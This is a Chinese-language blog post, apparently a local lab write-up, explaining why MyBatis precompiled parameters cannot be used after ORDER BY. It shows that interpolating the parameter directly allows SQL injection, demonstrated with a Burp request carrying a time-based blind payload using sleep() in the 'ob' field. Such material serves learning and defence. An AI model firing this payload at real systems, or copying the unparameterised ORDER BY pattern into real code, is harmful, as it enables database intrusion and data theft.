关于实现order by ? 无法使用预编译
感谢龙哥帮我写好的项目。
基于Springboot框架 ,使用mybatis来连接本地mysql数据库
进来配置好数据库名称 用户和密码
然后连接上数据库
这里用的语句是预编译的,之前说过order by这后面使用预编译是会报错的
select * from users where username = #{username} order by #{ob} desc;
先来查询只有一列返回结果的看看
返回的是ob获取为空,也就是说order by后的参数是没有获取到的
可能正是因为这个原因,获取的查询结果没有报错
查询admin 并且对id想倒序排列,我们知道ob采用了预编译 ,是无法成功获取的结果
看到并未成功 实现倒序排序,而且抛出异常错误
正常的查询排序应该是
那么如果把ob参数位置不适用预编译呢? 那样确实是可以实现正确的排序功能
这里实现了排序功能,但是安全性就出现问题了,可以直接被注入
用子查询注入来
会报错,说子查询的返回大于了一行,不过还是执行了查询 造成了延时 可以被注入
附上burp 数据包
POST /user HTTP/1.1 Host: localhost:8081 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: application/json, text/plain, */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: remember-me=YWRtaW46MTY0NzU2NjYyNTA1MDo1NzEzYWQwMDJmOTgzNmYxZTI3ODY2ODk3MTMwMzg3Yg Connection: close Content-Type: application/json Content-Length: 86 { "username":"admin", "ob":"id or (select*from(select+sleep(2)union/**/select+1)a)"}
修改后,改为 ArrayList<User> 获取返回值 能接收多个返回值
POST /user HTTP/1.1 Host: localhost:8081 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: application/json, text/plain, */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: remember-me=YWRtaW46MTY0NzU2NjYyNTA1MDo1NzEzYWQwMDJmOTgzNmYxZTI3ODY2ODk3MTMwMzg3Yg Connection: close Content-Type: application/json Content-Length: 29 { "date":"2022", "ob":"id"}